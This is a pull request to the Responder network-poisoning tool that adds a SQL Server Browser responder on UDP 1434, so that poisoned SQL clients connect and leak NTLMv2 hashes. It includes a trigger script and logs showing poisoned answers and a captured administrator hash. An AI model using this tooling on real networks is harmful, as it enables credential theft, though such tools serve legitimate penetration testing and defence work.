### PR TITLE
Add Microsoft SQL Server Browser responder

### DIFF
--- a/README.md
+++ b/README.md
@@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
 
 ## Considerations ##
 
-- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
 
 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
 

--- a/Responder.py
+++ b/Responder.py
@@ -268,8 +268,9 @@ def main():
 			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
 
 		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL
+			from servers.MSSQL import MSSQL, MSSQLBrowser
 			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
+			threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))
 
 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP


### PR DESCRIPTION
When connecting to a named instance, a SQL client (at least SQL Server Native Client) will send a request (namely a `CLNT_UCAST_INST` message) to the server's SQL Server Browser service for instance connection information. If it gets no response, the connection attempt fails.

By adding a SQL Server Browser responder for these requests, we ensure that connections are successfully made to the SQL Server responder for hash capture.

As per the comment, this is based on the document "[[MC-SQLR]: SQL Server Resolution Protocol](https://msdn.microsoft.com/en-us/library/cc219703.aspx)".

## Verification

Run the following VBScript which attempts to connect to named instance `INSTANCE` on (presumably) non-existent host `DOESNOTEXIST`:

```vbscript
CreateObject("ADODB.Connection").Open "Provider=SQLNCLI11;Data Source=DOESNOTEXIST\INSTANCE;Integrated Security=SSPI;"
```

Before patch:
```
[+] Listening for events...
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
```

After patch:
```
[+] Listening for events...
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[MSSQL-BROWSER] Sending poisoned browser response to 10.1.2.3
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[*] [LLMNR]  Poisoned answer sent to 10.1.2.3 for name doesnotexist
[MSSQL] NTLMv2 Client   : 10.1.2.3
[MSSQL] NTLMv2 Username : TEST\Administrator
[MSSQL] NTLMv2 Hash     : Administrator::TEST:1122334455667788:(etc...)
```